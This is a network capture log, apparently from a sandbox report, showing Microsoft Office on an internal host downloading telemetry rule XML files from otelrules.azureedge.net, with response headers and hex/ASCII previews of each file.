2024-11-07 03:13:19 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:19 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:19 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 117ebb00-e01e-0020-3440-2ede90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031319Z-15869dbbcc6rzfwxhC1DFWrkb000000002p000000000dz75 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:19 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49879	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:19 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:19 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:19 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031319Z-16547b76f7fr28cchC1DFWnuws00000007kg00000000p9hw x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:19 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	49878	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:19 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:19 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:19 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 09c80ed2-701e-003e-5d5f-2e79b3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031319Z-17df447cdb54qlp6hC1DFWqcfc00000003mg00000000qqwx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:19 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49881	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:19 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:19 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:19 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: fcf0554e-001e-0046-7a53-2eda4b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031319Z-15869dbbcc6ss7fxhC1DFWq6vs00000000vg00000000a93n x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:19 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:19 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:19 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:19 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 182ca2aa-101e-00a2-3955-2e9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031319Z-17df447cdb5fh5hghC1DFWam0400000000v000000000fnyf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:19 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49886	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:20 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:20 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:20 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 9890a075-d01e-002b-06d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031320Z-16547b76f7fwvr5dhC1DFW2c9400000007hg000000002khf x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:20 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49883	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:20 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:20 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:20 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: cea947a8-501e-0029-0de6-2fd0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031320Z-17df447cdb528ltlhC1DFWnt1c00000003r0000000001wa1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:20 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49885	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:20 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:20 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:20 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031320Z-16547b76f7fwvr5dhC1DFW2c9400000007dg00000000fg5t x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:20 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49884	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:20 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:20 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:20 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: a6457f9b-d01e-0014-585c-2eed58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031320Z-15869dbbcc6rzfwxhC1DFWrkb000000002p000000000dz8g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:20 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49888	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:21 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:21 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:21 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: 29f76c25-201e-0000-6fd2-2ca537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031321Z-16547b76f7f9bs6dhC1DFWt3rg00000007d000000000sg5w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:21 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49891	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:21 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:21 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:21 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: a0219141-901e-005b-3761-2e2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031321Z-15869dbbcc6ss7fxhC1DFWq6vs00000000ug00000000dc4x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:21 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49890	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:21 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:21 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:21 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 4847cb37-401e-0016-7fd2-2c53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031321Z-16547b76f7f8dwtrhC1DFWd1zn00000007pg00000000b1sv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
